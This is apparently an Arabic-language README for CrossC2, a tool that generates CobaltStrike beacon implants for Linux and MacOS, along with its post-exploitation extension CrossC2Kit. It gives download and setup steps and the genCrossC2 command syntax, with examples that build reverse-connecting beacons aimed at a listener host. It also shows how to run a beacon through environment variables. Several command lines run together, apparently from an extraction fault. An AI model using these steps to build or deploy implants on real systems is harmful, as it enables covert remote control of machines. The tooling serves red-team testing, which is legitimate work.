
توليد حمولة CobaltStrike عبر المنصات
README | 中文文档 | README_FULL | 中文完整文档
دعم تقييم أمان المنصات الأخرى (Linux/MacOS/...) عبر CobaltStrike، ويتضمن دعم تطوير وحدات ما بعد الاختراق لنظام Unix

- التحميل
قم بتنزيل CrossC2.cna و genCrossC2 و CrossC2Kit، ثم عدّل تهيئة CrossC2.cna
- إنشاء مستمع ونسخ المفتاح
windows/beacon_https/reverse_https.cobaltstrike.beacon_keys الموجود في دليل الخادم إلى الجهاز المحلي
- توسيع الوظائف
CrossC2Kit_Loader.cna، والذي يتضمن التحميل في الذاكرة ووظائف أخرىcs4.x، تفتقد وظائف إدارة الملفات وعرض العمليات؛ يجب استخدام هذا الـ Loader لإعادة التشغيل
- إنشاء beacon
استخدم وظيفة الواجهة الرسومية المقدمة من سطر الأوامر أو cna لإنشاء beacon افتراضيًا
genCrossC2 <ip/نطاق المستمع> <منفذ المستمع> <beacon_keys> <مكتبة إعادة الربط;config.ini;c2profile.profile> <نظام التشغيل المستهدف> <معمارية الهدف>
مثال:
1. قراءة BEACON_KEY من المسار الحالي وإنشاء BEACON باستخدام بروتوكول حركة C2Profile الافتراضي
genCrossC2 127.0.0.1 5555 null null Linux x64 beacon.out
2. تحديد beacon ببروتوكول مخصص باستخدام مكتبة ديناميكية
genCrossC2 127.0.0.1 5555 .cobaltstrike.beacon_keys c2profile.so MacOS x64 beacon.out
3. تحديد C2Profile الذي يحتاج إلى التحليل التلقائي
genCrossC2 www.example.com 443 .cobaltstrike.beacon_keys ";;c2profile.profile" Linux x64 beacon.out
يمكن العثور على إعدادات أكثر تقدماً في الوثائق: 📄مرجع
- تشغيل beacon
export CCPATH=/opt/ && /tmp/c2/tmp/c2 /tmp/c2-rebind.soexport CCHOST=127.0.0.1 && export CCPORT=443 && /tmp/c2export CCDEBUG=1 && /tmp/c2CrossC2Kit: https://github.com/CrossC2/CrossC2Kit
CrossC2Kit هو امتداد اختراقي حول منصة Unix مشتق من CrossC2. يستخدم محرك Aggressor Script مفتوح المصدر. يمكن استخدامه لإنشاء أتمتة تحاكي عمليات الفريق الأحمر وتوسيع عميل CobaltStrike.
CrossC2Kit يرث الميزات الأصلية لـ CobaltStrike، لذلك لا تزال قواعد الكتابة والتطوير تشير إلى الوثائق الرسمية: https://trial.cobaltstrike.com/aggressor-script/index.html
لكنه يحتوي على بعض امتدادات API فوق CrossC2 للتحكم في beacon لمنصة Unix
API: 📄مرجع
عرض توضيحي: 
للاستخدام الداخلي فقط من قبل المؤسسات والشركات. يتميز هذا الإطار بدرجة معينة من عدم الاستقرار. لا يُسمح لغير المحترفين باستخدامه. لا يجوز لأي شخص استخدامه لأغراض غير قانونية أو للربح. بالإضافة إلى ذلك، يُحظر نشر نسخ معدلة دون إذن، أو تحمل المسؤولية القانونية.
شكر خاص لـ @Emma على تصميم الشعار لـ CrossC2، والذي تم تصميمه على طراز سلسلة Armitage و CobaltStrike
| CS3.14 (إصلاحات الأخطاء) | CS4.0 | CS4.X (4.1~4.8) |
|---|
| الفرع الرئيسي | ✅ | ||
| فرع cs4.0 | ✅ | ||
| فرع cs4.1 | ✅ | ||
| صفحة الإصدار <= v2.1 | ✅ | ||
| صفحة الإصدار >= v2.2 | ✅ |